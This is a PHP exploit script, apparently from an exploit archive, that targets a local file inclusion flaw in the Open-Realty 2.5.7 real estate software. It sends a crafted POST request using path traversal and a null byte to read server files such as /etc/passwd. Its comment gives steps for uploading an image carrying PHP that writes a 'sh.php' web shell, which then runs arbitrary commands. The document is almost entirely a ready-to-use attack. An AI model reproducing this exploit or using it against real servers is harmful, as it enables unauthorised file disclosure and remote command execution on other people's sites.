Open-Realty 2.5.7 Local File Disclosure

`<?php  
/*  
* Exploit Title:  
* Date: 2010-08-18  
* Author: Nikola Petrov  
* Vendor: http://open-realty.org/  
* Version: 2.5.7  
*/  
/*  
vulnerable: Open-Realty 2.5.7  
LFI: /index.php  
  
upload image with: <?php system("echo \"<?php if(isset(\$_GET[\"cmd\"])) system(\$_GET[\"cmd\"]); ?>\" > sh.php"); ?>  
include the image and sh.php will be generated.  
proceed with sh.php  
  
MAGIC_QUOTES must be 'off' and %00 must not be replaced with \0.  
*/  
  
print "\n\n#########################################################################\n";  
print "#LFI discovery and implementation: Nikola Petrov ([email protected])\n";  
print "#Date: 05.09.2009\n";  
print "#########################################################################\n\n";  
  
if($argc < 5) {  
print "usage: $argv[0] host port path file [debug: 1/0]\n";  
print "example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\n\n\n";  
exit();  
}  
  
$Host = $argv[1];  
$Port = $argv[2];  
$Path = $argv[3];  
$File = $argv[4];  
  
function HttpSend($aHost, $aPort, $aPacket) {  
$Response = "";  
  
if(!$Socket = fsockopen($aHost, $aPort)) {  
print "Error connecting to $aHost:$aPort\n\n";  
exit();  
}  
  
fputs($Socket, $aPacket);  
  
while(!feof($Socket)) $Response .= fread($Socket, 1024);  
  
fclose($Socket);  
  
return $Response;  
}  
  
$VulnRequest = "select_users_lang=". $File . "%00";  
  
$Packet = "POST {$Path} HTTP/1.1\r\n";  
$Packet .= "Host: {$Host}\r\n";  
$Packet .= "Content-Type: application/x-www-form-urlencoded\r\n";  
$Packet .= "Content-Length: " . strlen($VulnRequest) . "\r\n\r\n";  
$Packet .= "$VulnRequest\n";  
  
if($argv[5] == 1) print $Packet;  
  
print HttpSend($Host, $Port, $Packet);  
?>  
  
`